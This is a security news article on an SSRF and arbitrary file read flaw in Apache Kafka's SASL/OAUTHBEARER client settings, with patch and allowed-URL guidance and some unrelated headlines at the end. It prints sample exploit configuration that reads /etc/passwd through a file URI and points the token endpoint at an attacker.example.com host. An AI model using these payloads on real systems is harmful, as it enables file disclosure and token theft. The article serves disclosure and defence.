A concerning security flaw has emerged affecting Apache Kafka, the widely adopted distributed event streaming platform. Researchers have identified a Severe Server Side Request Forgery (SSRF) vulnerability coupled with arbitrary file read capability within its SASL/OAUTHBEARER client configuration system.
This vulnerability exposes systems to significant risk, especially in environments where Kafka client configuration can be influenced by untrusted users.
The vulnerability centers on the way Apache Kafka Clients handle configuration options for SASL/OAUTHBEARER authentication. Specifically, the settings sasl.oauthbearer.token.endpoint.url and sasl.oauthbearer.jwks.endpoint.url are meant to specify the location of authentication tokens and JSON Web Key Sets. However, these parameters are not sufficiently restricted, allowing malicious actors to set them to arbitrary values, including:
Exploitation Example:
In a Kafka Connect REST API scenario, if an attacker can provide configuration data (e.g., via the REST API of a managed Kafka Connect service), they can specify paths or URLs that leak sensitive information or trigger requests to unintended services.
Here’s a sample configuration that could be exploited, potentially allowing file reads or SSRF:
textsasl.mechanism=OAUTHBEARER
sasl.login.callback.handler.class=org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler
sasl.jaas.config=org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required;
sasl.oauthbearer.token.endpoint.url=file:///etc/passwd
The above could, in some versions or error log output, result in the contents of /etc/passwd being included in error messages (for file URIs). Similarly, if set to an HTTP URL, the Kafka client would attempt to reach out to that endpoint:
textsasl.oauthbearer.token.endpoint.url=https://attacker.example.com
This could leak authentication tokens or sensitive information to an attacker-controlled server.
Patch and Configuration Update
Apache Kafka has addressed this vulnerability starting from version 3.9.1 and 4.0.0:
-Dorg.apache.kafka.sasl.oauthbearer.allowed.urlsExample of how to configure the allowed URLs:
bashjava -Dorg.apache.kafka.sasl.oauthbearer.allowed.urls=https://trusted-auth.example.com,https://internal-auth.example.com -jar your-kafka-connect.jar
This ensures that only specified endpoints can be used for token and JWKS retrieval, significantly reducing the risk of exploitation.
The SSRF and arbitrary file read vulnerabilities in Apache Kafka’s SASL/OAUTHBEARER client configuration mechanism present a real risk, particularly in managed environments like Kafka Connect. Attackers could use these flaws to access sensitive files or trigger requests to arbitrary locations.
By upgrading to Kafka 3.9.1 or newer and configuring allowed URLs, organizations can dramatically reduce their attack surface.
Given the widespread use of Apache Kafka in mission-critical systems, rapid adoption of these security improvements is strongly recommended.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…